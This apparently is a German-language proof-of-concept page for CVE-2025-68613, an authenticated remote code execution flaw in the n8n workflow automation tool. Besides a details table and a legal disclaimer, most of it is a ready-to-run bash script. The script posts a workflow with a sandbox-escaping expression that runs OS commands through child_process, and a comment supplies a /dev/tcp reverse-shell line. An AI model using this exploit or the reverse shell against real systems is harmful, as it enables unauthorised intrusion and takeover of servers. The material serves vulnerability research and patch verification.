
Proof-of-Concept-Exploit für CVE-2025-68613: Authentifizierte Remote-Codeausführung in n8n durch Ausdrucksinjektion
Kritische Remote-Code-Ausführung (CVSS 9.9) im n8n-Workflow-Automatisierungstool
Proof of Concept – Nur für Bildungszwecke und autorisierte Sicherheitsforschung
Dieser Code wird AUSSCHLIESSLICH für Bildungszwecke und autorisierte Sicherheitstests in kontrollierten Laborumgebungen bereitgestellt.
Die unbefugte Nutzung auf Produktionssystemen oder einem System ohne ausdrückliche schriftliche Genehmigung ist illegal und verstößt in den meisten Rechtsräumen gegen Gesetze zur Computerkriminalität und Cybersicherheit.
Nutzung auf eigene Verantwortung. Der Autor übernimmt keine Verantwortung für Missbrauch.
| Feld | Einzelheiten |
|---|
| Exploit-Titel | n8n Authentifizierte Expression-Injection Remote Code Execution |
| CVE | CVE-2025-68613 |
| Offenlegungsdatum | 2025-12-25 |
| Autor | Mohammed Idrees Banyamer |
| Autorenland | Jordanien |
| Kontakt / Sozial | Instagram: @banyamer_security |
| GitHub | mbanyamer |
| Anbieter | n8n.io |
| Software-Repository | github.com/n8n-io/n8n |
| Verwundbare Versionen | ≥ 0.211.0 < 1.120.4 |
| Gepatchte Versionen | 1.120.4, 1.121.1, 1.122.0 und höher |
| Getestet auf | n8n 1.119.3 (Docker) |
| Schwachstellentyp | Authentifizierte Remote-Code-Ausführung durch Expression-Sandbox-Escape |
| CVSS-Score | 9.9 (Kritisch) |
Diese Schwachstelle ermöglicht es einem authentifizierten Benutzer, Workflows mithilfe bösartiger Ausdrücke zu erstellen oder zu ändern, die die Ausdrucks-Sandbox von n8n umgehen, was zur vollständigen Ausführung von Betriebssystembefehlen mit den Rechten des n8n-Prozesses führt.
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613
TARGET="http://localhost:5678" # ← Change to your target
API_KEY="your_n8n_api_key_here" # ← Insert valid API Key (or use Basic Auth / session)
CMD="id" # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"
echo "[*] Sending malicious workflow to ${TARGET}"
curl -s -X POST "${TARGET}/rest/workflows" \
-H "Content-Type: application/json" \
-H "X-N8N-API-KEY: ${API_KEY}" \
-d '{
"name": "CVE-2025-68613 PoC",
"active": false,
"nodes": [
{
"parameters": {
"values": {
"string": [
{
"name": "result",
"value": "'${PAYLOAD}'"
}
]
}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 1,
"position": [460, 300]
}
],
"connections": {}
}'
echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"